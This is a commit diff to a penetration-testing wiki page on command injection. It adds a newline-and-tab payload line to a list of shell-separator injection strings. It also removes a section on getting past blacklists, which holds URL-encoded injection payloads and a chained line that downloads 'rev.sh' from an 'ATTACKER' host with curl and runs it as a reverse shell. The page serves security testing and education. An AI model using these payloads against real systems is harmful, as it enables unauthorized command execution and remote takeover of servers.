Update command-injection.md

Author: carlospolop

src/pentesting-web/command-injection.md

@@ -19,6 +19,7 @@ ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
 ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
 ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
 ls %0A id # %0A Execute both (RECOMMENDED)
+ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)
 
 #Only unix supported
 `ls` # ``
@@ -131,37 +132,6 @@ powershell C:**2\n??e*d.*? # notepad
 ../linux-hardening/bypass-bash-restrictions/
 {{#endref}}
 
-##### Newline and tab blacklist bypass (space and metacharacters filtered)
-
-Many “naive blacklist” filters block space and shell metacharacters like `;`, `&`, `|`, `` ` ``, `{`, `}`, `&&`, but forget to block newlines (`%0a`) and tabs (`%09`). If user input is concatenated into a shell command (for example via PHP `proc_open()`/`system()`), you can:
-
-- Inject a newline to start a new command
-- Use tabs as whitespace where space is blocked
-
-Example payload for a password-like field reaching a shell (URL-encoded):
-
-```
-0xdf%0abash%09-c%09"id"%0a
-```
-
-The resulting process executes as two lines:
-
-```
-zip -x './backups/*' -r -P 0xdf
-bash	-c	"id"
-```
-
-Chaining without `&`: fetch and execute a reverse shell in separate lines:
-
-```
-0xdf%0abash%09-c%09"curl%09http://ATTACKER/rev.sh"%0abash%09rev.sh%0a
-```
-
-Notes
-- Newlines are command separators for POSIX shells; tabs are valid whitespace.
-- This works even if spaces and `;|&` are filtered, as long as `\n` and `\t` are not.
-- See PHP docs for `proc_open()`/`system()` behavior when given a string (it spawns `/bin/sh -c`).
-
 ### Node.js `child_process.exec` vs `execFile`
 
 When auditing JavaScript/TypeScript back-ends you will often encounter the Node.js `child_process` API.